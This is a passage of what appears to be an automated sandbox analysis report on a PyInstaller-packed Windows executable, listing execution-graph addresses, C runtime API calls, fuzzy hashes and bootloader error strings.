                                                                                                                                                                                                            • Opcode ID: 4110ab54a1292af6c610fc14bebcfde478b3b42ba13f09fd81a5f0b3dffa68e3
                                                                                                                                                                                                            • Instruction ID: 4d71671faf30ffc65a265887edb7199b2c699ed85b22a12e0cc2efba0b7b364c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4110ab54a1292af6c610fc14bebcfde478b3b42ba13f09fd81a5f0b3dffa68e3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1601843191E642A6F730BF60946227EE390EF44744FC60536E65E676A5DF3CE504CA24

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:1%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                            Total number of Nodes:816
                                                                                                                                                                                                            Total number of Limit Nodes:29
7ff7ace94374 11 API calls _get_daylight 100087->100097 100089 7ff7ace990c2 100098 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100089->100098 100092 7ff7ace9570c 39 API calls 3 library calls 100091->100092 100092->100064 100093->100069 100094->100071 100095->100073 100096->100065 100097->100089 100099->99987 100100->99992 100101->99992 100102->99995 100104 7ff7ace810a6 100103->100104 100105 7ff7ace810ad 100104->100105 100106 7ff7ace810d3 100104->100106 100129 7ff7ace82770 59 API calls 2 library calls 100105->100129 100109 7ff7ace810ed 100106->100109 100110 7ff7ace81109 100106->100110 100108 7ff7ace810c0 100108->100017 100130 7ff7ace824d0 59 API calls 3 library calls 100109->100130 100112 7ff7ace8111b 100110->100112 100119 7ff7ace81137 memcpy_s 100110->100119 100131 7ff7ace824d0 59 API calls 3 library calls 100112->100131 100114 7ff7ace8f52c _fread_nolock 53 API calls 100114->100119 100115 7ff7ace81104 __std_exception_copy 100115->100017 100116 7ff7ace811fe 100132 7ff7ace82770 59 API calls 2 library calls 100116->100132 100119->100114 100119->100115 100119->100116 100120 7ff7ace8f2a0 37 API calls 100119->100120 100125 7ff7ace8fc6c 100119->100125 100120->100119 100121->100010 100122->100011 100123->100017 100124->100017 100126 7ff7ace8fc9c 100125->100126 100133 7ff7ace8f9bc 100126->100133 100128 7ff7ace8fcba 100128->100119 100129->100108 100130->100115 100131->100115 100132->100115 100134 7ff7ace8f9dc 100133->100134 100139 7ff7ace8fa09 100133->100139 100135 7ff7ace8fa11 100134->100135 100136 7ff7ace8f9e6 100134->100136 100134->100139 100140 7ff7ace8f8fc 100135->100140 100147 7ff7ace99c14 37 API calls 2 library calls 100136->100147 100139->100128 100148 7ff7ace9421c EnterCriticalSection 100140->100148 100142 7ff7ace8f919 100143 7ff7ace8f93c 74 API calls 100142->100143 100144 7ff7ace8f922 100143->100144 100145 7ff7ace94228 _fread_nolock LeaveCriticalSection 100144->100145 100146 7ff7ace8f92d 100145->100146 100146->100139 100147->100139 100150 7ff7ace829a6 
100149->100150 100151 7ff7ace81b30 49 API calls 100150->100151 100153 7ff7ace829db 100151->100153 100152 7ff7ace82dc9 100153->100152 100154 7ff7ace83b00 49 API calls 100153->100154 100155 7ff7ace82a57 100154->100155 100206 7ff7ace82ff0 100155->100206 100158 7ff7ace82ae7 100214 7ff7ace86700 98 API calls 100158->100214 100159 7ff7ace82ff0 75 API calls 100161 7ff7ace82ae3 100159->100161 100161->100158 100163 7ff7ace82b55 100161->100163 100162 7ff7ace82aef 100164 7ff7ace82b0c 100162->100164 100215 7ff7ace865e0 134 API calls 2 library calls 100162->100215 100165 7ff7ace82ff0 75 API calls 100163->100165 100202 7ff7ace82b26 100164->100202 100216 7ff7ace82770 59 API calls 2 library calls 100164->100216 100167 7ff7ace82b7e 100165->100167 100169 7ff7ace82bd8 100167->100169 100170 7ff7ace82ff0 75 API calls 100167->100170 100169->100164 100217 7ff7ace86700 98 API calls 100169->100217 100172 7ff7ace82bab 100170->100172 100172->100169 100175 7ff7ace82ff0 75 API calls 100172->100175 100173 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100174 7ff7ace82b4a 100173->100174 100174->99784 100175->100169 100176 7ff7ace81af0 59 API calls 100178 7ff7ace82c3f 100176->100178 100177 7ff7ace82be8 100177->100164 100177->100176 100179 7ff7ace82d06 100177->100179 100178->100164 100180 7ff7ace81b30 49 API calls 100178->100180 100179->100164 100193 7ff7ace82d1e 100179->100193 100181 7ff7ace82c67 100180->100181 100182 7ff7ace82da2 100181->100182 100183 7ff7ace81b30 49 API calls 100181->100183 100223 7ff7ace82770 59 API calls 2 library calls 100182->100223 100185 7ff7ace82c94 100183->100185 100185->100182 100188 7ff7ace81b30 49 API calls 100185->100188 100186 7ff7ace82d01 100224 7ff7ace81ab0 74 API calls __std_exception_copy 100186->100224 100191 7ff7ace82cc1 100188->100191 100191->100182 100192 7ff7ace82ccc 100191->100192 100194 7ff7ace817b0 121 API calls 100192->100194 100195 7ff7ace82d84 100193->100195 100193->100202 100219 7ff7ace81440 161 API calls 2 library calls 100193->100219 100220 7ff7ace81780 
59 API calls 100193->100220 100196 7ff7ace82ce3 100194->100196 100221 7ff7ace82770 59 API calls 2 library calls 100195->100221 100196->100193 100198 7ff7ace82ce7 100196->100198 100218 7ff7ace824d0 59 API calls 3 library calls 100198->100218 100199 7ff7ace82d95 100222 7ff7ace81ab0 74 API calls __std_exception_copy 100199->100222 100202->100173 100203->99784 100204->99779 100205->99784 100207 7ff7ace83024 100206->100207 100225 7ff7ace93b14 100207->100225 100210 7ff7ace8305b 100212 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100210->100212 100213 7ff7ace82a96 100212->100213 100213->100158 100213->100159 100214->100162 100215->100164 100216->100202 100217->100177 100218->100186 100219->100193 100220->100193 100221->100199 100222->100202 100223->100186 100224->100164 100229 7ff7ace93b6e 100225->100229 100226 7ff7ace93b93 100260 7ff7ace99c14 37 API calls 2 library calls 100226->100260 100228 7ff7ace93bcf 100261 7ff7ace91da0 49 API calls _invalid_parameter_noinfo 100228->100261 100229->100226 100229->100228 100231 7ff7ace93bbd 100233 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100231->100233 100232 7ff7ace99d48 __free_lconv_num 11 API calls 100232->100231 100234 7ff7ace8304a 100233->100234 100234->100210 100243 7ff7ace94d38 100234->100243 100235 7ff7ace93c66 100236 7ff7ace93c78 100235->100236 100237 7ff7ace93cac 100235->100237 100238 7ff7ace93cd0 100235->100238 100239 7ff7ace93c81 100235->100239 100236->100237 100236->100239 100237->100232 100238->100237 100241 7ff7ace93cda 100238->100241 100262 7ff7ace99d48 100239->100262 100242 7ff7ace99d48 __free_lconv_num 11 API calls 100241->100242 100242->100231 100244 7ff7ace94d61 100243->100244 100245 7ff7ace94d55 100243->100245 100294 7ff7ace9494c 45 API calls __GetCurrentState 100244->100294 100269 7ff7ace945b0 100245->100269 100248 7ff7ace94d5a 100248->100210 100249 7ff7ace94d89 100252 7ff7ace94d99 100249->100252 100295 7ff7ace9defc 5 API calls __crtLCMapStringW 100249->100295 100296 7ff7ace94434 14 API calls 3 library calls 
100252->100296 100253 7ff7ace94df1 100254 7ff7ace94e09 100253->100254 100255 7ff7ace94df5 100253->100255 100256 7ff7ace945b0 69 API calls 100254->100256 100255->100248 100257 7ff7ace99d48 __free_lconv_num 11 API calls 100255->100257 100258 7ff7ace94e15 100256->100258 100257->100248 100258->100248 100259 7ff7ace99d48 __free_lconv_num 11 API calls 100258->100259 100259->100248 100260->100231 100261->100235 100263 7ff7ace99d4d HeapFree 100262->100263 100267 7ff7ace99d7c 100262->100267 100264 7ff7ace99d68 GetLastError 100263->100264 100263->100267 100265 7ff7ace99d75 __free_lconv_num 100264->100265 100268 7ff7ace94374 11 API calls _get_daylight 100265->100268 100267->100231 100268->100267 100270 7ff7ace945e7 100269->100270 100271 7ff7ace945ca 100269->100271 100270->100271 100273 7ff7ace945fa CreateFileW 100270->100273 100323 7ff7ace94354 11 API calls _get_daylight 100271->100323 100275 7ff7ace94664 100273->100275 100276 7ff7ace9462e 100273->100276 100274 7ff7ace945cf 100324 7ff7ace94374 11 API calls _get_daylight 100274->100324 100326 7ff7ace94c28 46 API calls 3 library calls 100275->100326 100297 7ff7ace94704 GetFileType 100276->100297 100280 7ff7ace94669 100283 7ff7ace94698 100280->100283 100284 7ff7ace9466d 100280->100284 100281 7ff7ace945d7 100325 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100281->100325 100328 7ff7ace949e8 100283->100328 100327 7ff7ace942e8 11 API calls 2 library calls 100284->100327 100286 7ff7ace94643 CloseHandle 100290 7ff7ace945e2 100286->100290 100287 7ff7ace94659 CloseHandle 100287->100290 100290->100248 100293 7ff7ace94677 100293->100290 100294->100249 100295->100252 100296->100253 100298 7ff7ace9480f 100297->100298 100299 7ff7ace94752 100297->100299 100301 7ff7ace94817 100298->100301 100302 7ff7ace94839 100298->100302 100300 7ff7ace9477e GetFileInformationByHandle 100299->100300 100346 7ff7ace94b24 21 API calls _fread_nolock 100299->100346 100305 7ff7ace947a7 100300->100305 100306 7ff7ace9482a GetLastError 100300->100306 
100301->100306 100307 7ff7ace9481b 100301->100307 100303 7ff7ace9485c PeekNamedPipe 100302->100303 100321 7ff7ace947fa 100302->100321 100303->100321 100308 7ff7ace949e8 51 API calls 100305->100308 100349 7ff7ace942e8 11 API calls 2 library calls 100306->100349 100348 7ff7ace94374 11 API calls _get_daylight 100307->100348 100313 7ff7ace947b2 100308->100313 100311 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100314 7ff7ace9463c 100311->100314 100312 7ff7ace9476c 100312->100300 100312->100321 100339 7ff7ace948ac 100313->100339 100314->100286 100314->100287 100317 7ff7ace948ac 10 API calls 100318 7ff7ace947d1 100317->100318 100319 7ff7ace948ac 10 API calls 100318->100319 100320 7ff7ace947e2 100319->100320 100320->100321 100347 7ff7ace94374 11 API calls _get_daylight 100320->100347 100321->100311 100323->100274 100324->100281 100326->100280 100327->100293 100330 7ff7ace94a10 100328->100330 100329 7ff7ace946a5 100338 7ff7ace94b24 21 API calls _fread_nolock 100329->100338 100330->100329 100350 7ff7ace9e5a4 51 API calls 2 library calls 100330->100350 100332 7ff7ace94aa4 100332->100329 100351 7ff7ace9e5a4 51 API calls 2 library calls 100332->100351 100334 7ff7ace94ab7 100334->100329 100352 7ff7ace9e5a4 51 API calls 2 library calls 100334->100352 100336 7ff7ace94aca 100336->100329 100353 7ff7ace9e5a4 51 API calls 2 library calls 100336->100353 100338->100293 100340 7ff7ace948d5 FileTimeToSystemTime 100339->100340 100341 7ff7ace948c8 100339->100341 100342 7ff7ace948e9 SystemTimeToTzSpecificLocalTime 100340->100342 100344 7ff7ace948d0 100340->100344 100341->100340 100341->100344 100342->100344 100343 7ff7ace8acd0 _wfindfirst32i64 8 API calls 100345 7ff7ace947c1 100343->100345 100344->100343 100345->100317 100346->100312 100347->100321 100348->100321 100349->100321 100350->100332 100351->100334 100352->100336 100353->100329 100355 7ff7ace9532c 100354->100355 100356 7ff7ace95352 100355->100356 100359 7ff7ace95385 100355->100359 100385 7ff7ace94374 11 API calls _get_daylight 
100356->100385 100358 7ff7ace95357 100386 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100358->100386 100361 7ff7ace95398 100359->100361 100362 7ff7ace9538b 100359->100362 100373 7ff7ace9a028 100361->100373 100387 7ff7ace94374 11 API calls _get_daylight 100362->100387 100364 7ff7ace83ce9 100364->99796 100367 7ff7ace953b9 100380 7ff7ace9f3cc 100367->100380 100368 7ff7ace953ac 100388 7ff7ace94374 11 API calls _get_daylight 100368->100388 100371 7ff7ace953cc 100389 7ff7ace94228 LeaveCriticalSection 100371->100389 100390 7ff7ace9f6b8 EnterCriticalSection 100373->100390 100375 7ff7ace9a03f 100376 7ff7ace9a09c 19 API calls 100375->100376 100377 7ff7ace9a04a 100376->100377 100378 7ff7ace9f718 _isindst LeaveCriticalSection 100377->100378 100379 7ff7ace953a2 100378->100379 100379->100367 100379->100368 100391 7ff7ace9f0c8 100380->100391 100383 7ff7ace9f426 100383->100371 100385->100358 100387->100364 100388->100364 100392 7ff7ace9f103 __vcrt_InitializeCriticalSectionEx 100391->100392 100401 7ff7ace9f2ca 100392->100401 100406 7ff7acea53a4 51 API calls 3 library calls 100392->100406 100394 7ff7ace9f3a1 100410 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100394->100410 100396 7ff7ace9f2d3 100396->100383 100403 7ff7acea608c 100396->100403 100398 7ff7ace9f335 100398->100401 100407 7ff7acea53a4 51 API calls 3 library calls 100398->100407 100400 7ff7ace9f354 100400->100401 100408 7ff7acea53a4 51 API calls 3 library calls 100400->100408 100401->100396 100409 7ff7ace94374 11 API calls _get_daylight 100401->100409 100411 7ff7acea568c 100403->100411 100406->100398 100407->100400 100408->100401 100409->100394 100412 7ff7acea56c1 100411->100412 100413 7ff7acea56a3 100411->100413 100412->100413 100416 7ff7acea56dd 100412->100416 100465 7ff7ace94374 11 API calls _get_daylight 100413->100465 100415 7ff7acea56a8 100466 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100415->100466 100422 7ff7acea5c9c 100416->100422 100419 7ff7acea56b4 100419->100383 100468 7ff7acea59d0 
100422->100468 100425 7ff7acea5d11 100499 7ff7ace94354 11 API calls _get_daylight 100425->100499 100426 7ff7acea5d29 100487 7ff7ace96c2c 100426->100487 100430 7ff7acea5d16 100500 7ff7ace94374 11 API calls _get_daylight 100430->100500 100437 7ff7acea5708 100437->100419 100467 7ff7ace96c04 LeaveCriticalSection 100437->100467 100465->100415 100469 7ff7acea5a16 100468->100469 100470 7ff7acea59fc 100468->100470 100473 7ff7acea5a94 100469->100473 100514 7ff7ace94374 11 API calls _get_daylight 100469->100514 100470->100469 100512 7ff7ace94374 11 API calls _get_daylight 100470->100512 100472 7ff7acea5a0b 100513 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100472->100513 100475 7ff7acea5ae5 100473->100475 100516 7ff7ace94374 11 API calls _get_daylight 100473->100516 100483 7ff7acea5b42 100475->100483 100518 7ff7ace9569c 37 API calls 2 library calls 100475->100518 100478 7ff7acea5b3e 100478->100483 100484 7ff7ace99d00 _wfindfirst32i64 17 API calls 100478->100484 100479 7ff7acea5ada 100517 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100479->100517 100482 7ff7acea5a89 100515 7ff7ace99ce0 37 API calls _invalid_parameter_noinfo 100482->100515 100483->100425 100483->100426 100486 7ff7acea5bd5 100484->100486 100519 7ff7ace9f6b8 EnterCriticalSection 100487->100519 100499->100430 100500->100437 100512->100472 100514->100482 100516->100479 100518->100478 100521 7ff7ace97898 100520->100521 100524 7ff7ace97374 100521->100524 100523 7ff7ace978b1 100523->99806 100525 7ff7ace9738f 100524->100525 100526 7ff7ace973be 100524->100526 100535 7ff7ace99c14 37 API calls 2 library calls 100525->100535 100534 7ff7ace9421c EnterCriticalSection 100526->100534 100529 7ff7ace973c3 100530 7ff7ace973e0 38 API calls 100529->100530 100531 7ff7ace973cf 100530->100531 100532 7ff7ace94228 _fread_nolock LeaveCriticalSection 100531->100532 100533 7ff7ace973af 100532->100533 100533->100523 100535->100533 100537 7ff7ace8f001 100536->100537 100538 7ff7ace8efd3 100536->100538 100542 7ff7ace8eff3 
100537->100542 100546 7ff7ace9421c EnterCriticalSection 100537->100546 100547 7ff7ace99c14 37 API calls 2 library calls 100538->100547 100541 7ff7ace8f018 100543 7ff7ace8f034 72 API calls 100541->100543 100542->99810 100544 7ff7ace8f024 100543->100544 100545 7ff7ace94228 _fread_nolock LeaveCriticalSection 100544->100545 100545->100542 100547->100542

Control-flow Graph

• Executed
• Not Executed
Function 7ff7acea4d50 (control_flow_graph node 149)
APIs
• _get_daylight.LIBCMT ref: 00007FF7ACEA4D95
  • Part of subcall function 00007FF7ACEA46E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA46FC
  • Part of subcall function 00007FF7ACE99D48: HeapFree.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
  • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
  • Part of subcall function 00007FF7ACE99D00: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7ACE99CDF,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE99D09
  • Part of subcall function 00007FF7ACE99D00: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7ACE99CDF,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE99D2E
• _get_daylight.LIBCMT ref: 00007FF7ACEA4D84
  • Part of subcall function 00007FF7ACEA4748: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA475C
• _get_daylight.LIBCMT ref: 00007FF7ACEA4FFA
• _get_daylight.LIBCMT ref: 00007FF7ACEA500B
• _get_daylight.LIBCMT ref: 00007FF7ACEA501C
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7ACEA525C), ref: 00007FF7ACEA5043
Strings
Memory Dump Source
• Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 4070488512-239921721
• Opcode ID: 9604240e68820e5562e5c5bdf89ef322da5820e448d3a90649f181d06af63343
• Instruction ID: cc3d5d07ba566296964640fa477d9531a66c568089070c5d1f02e8e399f8538d
• Opcode Fuzzy Hash: 9604240e68820e5562e5c5bdf89ef322da5820e448d3a90649f181d06af63343
• Instruction Fuzzy Hash: 0BD1F576A0E642AAEB20FF21D4811B9E791FF84785FCA9035EA0D576A5DF3CE441C360

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                            • Opcode ID: 632e748b839932f5b00ec5f176d5a067dee1d4c4f3157cbf34afbb6f699b0397
                                                                                                                                                                                                            • Instruction ID: aa2eed03ff51c4924e06a66f0e0230fac6009a17ca9d9430a36da21129a4c5d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 632e748b839932f5b00ec5f176d5a067dee1d4c4f3157cbf34afbb6f699b0397
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3C1E276B2EA4199EB10EF65C4802BD7761FB49B98B864235DF2E673A4CF38D055C310

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4FFA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA4748: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA475C
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA500B
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA46E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA46FC
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA501C
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA4718: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA472C
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: HeapFree.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7ACEA525C), ref: 00007FF7ACEA5043
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                            • API String ID: 3458911817-239921721
                                                                                                                                                                                                            • Opcode ID: 35e2d5c93137b8b0a027e840dca31b369a239d429a1659609ffe838318533280
                                                                                                                                                                                                            • Instruction ID: ac9bf935b0cae6e4f66910006810c6ae978cf18dca6ee422b6086e60a12a7dfd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35e2d5c93137b8b0a027e840dca31b369a239d429a1659609ffe838318533280
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A751A772A0EA42AAE710FF21D5811B9F760FB48745FC64135EA4D976B5DF3CE5008760

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285465088.00007FF8A7EA1000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8A7EA0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285448152.00007FF8A7EA0000.00000002.00000001.01000000.00000029.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285487043.00007FF8A7EBC000.00000002.00000001.01000000.00000029.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285506628.00007FF8A7EC9000.00000004.00000001.01000000.00000029.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285524281.00007FF8A7ECF000.00000002.00000001.01000000.00000029.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ea0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Unicode_$Err_Size$Arg_FormatParseTuple_$FreeLibraryLoadMem_$CharClearErrorFromLastStringWide
                                                                                                                                                                                                            • String ID: <None>$O|i:load_library$U|i:load_library$cannot call dlopen(NULL)$cannot load library '%s': %s$dlopen() takes a file name or 'void *' handle, not '%s'$dlopen(None) not supported on Windows$error 0x%x$et|i:load_library$|Oi:load_library
                                                                                                                                                                                                            • API String ID: 2215032769-880521189
                                                                                                                                                                                                            • Opcode ID: 764e71f7d5ed0d7f936479e041b02300a4ec3b1ed7d0c21ea5e238435aa1c0ea
                                                                                                                                                                                                            • Instruction ID: 7f7e6a1acc76f2ecedd6a93da04c0afe6dc48d87f4948dc9835e5143a3c8b7a5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 764e71f7d5ed0d7f936479e041b02300a4ec3b1ed7d0c21ea5e238435aa1c0ea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72911636B0AA86E5EB11CF61E8401BC2761FF94FD5B448532EA0D476A4EF3CE569E340

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                            • API String ID: 2153230061-4158440160
                                                                                                                                                                                                            • Opcode ID: 076990a9cdb365f37a486f0801e3f63eb4f8c25b8143e7edd0e93668b4333e5c
                                                                                                                                                                                                            • Instruction ID: 2bf2c02124c62f8ea5b6fad07ba3e8c1b5f6a01171734c86714095ebadadf1dc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 076990a9cdb365f37a486f0801e3f63eb4f8c25b8143e7edd0e93668b4333e5c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53519272A0E682A6EB54EF24D55017CB3A0FF48B49B969135D90DA73B9DF3CE440CB60

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
